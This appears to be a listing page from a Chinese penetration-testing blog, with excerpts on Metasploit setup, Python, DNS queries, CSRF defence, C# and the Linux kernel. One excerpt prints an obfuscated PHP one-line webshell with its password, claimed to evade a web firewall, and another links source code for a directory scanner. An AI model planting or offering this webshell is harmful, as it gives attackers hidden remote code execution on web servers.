渗透编程 - 暗月博客|网络安全,WEB渗透,数据安全,渗透编程,安全培训

ubuntu16.04安装metasploit+postgresql

mOon    渗透编程     987次查看    2条评论    2016年11月25日

1、安装msf 1.1、打开终端,进入安装目录(你想放在哪就进哪 cd /opt curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > ...

多线程列子

mOon    渗透编程     1196次查看    抢沙发    2016年03月28日

# -*- coding: utf-8 -*- from BeautifulSoup import BeautifulSoup import requests import threading import Queue import time with open('url.txt') as f:     l = f.readlines()...

python用指定的dns服务器, 查询域名解析结果

mOon    渗透编程     2341次查看    抢沙发    2016年02月27日

最近有一个域名刚刚做了解析, 半天不能访问, 由于域名服务商碰巧是一个比较小的公司, 很好奇到底解析操作成功了吗, 一方面是这个域名商自己是否已经开始解析, 另一方面是其他dns有没有更新记录? 另外一个linux 下的命令行也可以达到同样的结果:  dig @8.8.8.8 www.xuli.co 所以搜了一个python 版本的查询示例, 需要安装的库是 dnspython ...

CSRF的防御实例(PHP)

mOon    渗透编程     1595次查看    抢沙发    2016年02月23日

CSRF的防御可以从服务端和客户端两方面着手,防御效果是从服务端着手效果比较好,现在一般的CSRF防御也都在服务端进行。   1.服务端进行CSRF防御   服务端的CSRF方式方法很多样,但总的思想都是一致的,就是在客户端页面增加伪随机数。   (1).Cookie Hashing(所有表单都包含同一个伪随机值):   这可能是最简单的解决方...

关于被动式扫描的碎碎念

mOon    渗透编程     1033次查看    抢沙发    2016年02月06日

0x00 简介 分布式扫描好多人都写过,例如: burp的sqli插件 Matt前辈的http://zone.wooyun.org/content/24172 猪猪侠前辈的http://zone.wooyun.org/content/21289 Ver007前辈的http://zone.wooyun.org/content/24...

工作队列wait queue() wait_event() interruptible_sleep_on()等应用方法

mOon    渗透编程     1310次查看    抢沙发    2016年01月12日

在Linux驱动程序中,可以使用等待队列(wait queue)来实现阻塞进程的唤醒。wait queue很早就作为一种基本的功能单位出现在Linux内核里了,它以队列位基础数据结构,与进程调度机制紧密结合,能够用于实现内核中异步事件通知机制。等待队列可以用来同步对系统资源的访问。(信号量在内核中也依赖等待队列来实现)。     Linux-2.6提供如下关于...

(C#)使用队列(Queue)解决简单的并发问题

mOon    渗透编程     1276次查看    抢沙发    2016年01月12日

有一个场景:一个抢购的项目,假设有5件商品,谁先抢到谁可以买,但是如果此时此刻(这里的此时此刻假设是相同的时间),有100人去抢这个商品,如果使用平时的方法会出现什么情况呢?你懂的,这里所说是就是有关并发的问题。 平时我们去超市购物去结账的时候就是排队,这里我们先让抢购人排好队,按时间,谁先点击的抢购按钮谁就排在前面,这样就形成了一个队列,然后我们再对这个队列处理,这样就不会出现...

C#连接Oracle数据库的四种方法

mOon    渗透编程     1505次查看    抢沙发    2015年09月13日

                              C#连接数据库的四种方法 在进行以下连接数据库之前,请先在本地安装好Oracle Client,同时本次测试System.Data的版本为:2.0.0.0。 ...

发个免杀一句话已过狗

mOon    渗透编程     2119次查看    2条评论    2015年09月13日

发个免杀一句话已过狗 <?php preg_replace("/[errorpage]/e",@str_rot13([email protected]($_CBFG[cntr]);'),"saft"); ?> 密码page

New御剑1.5 - 源码

mOon    渗透编程     3492次查看    2条评论    2015年07月31日

New御剑1.5 - 源码 vb.net 源码下载: 链接:http://pan.baidu.com/s/1yiT7C 密码:dzns 解压码 www.moonsec.com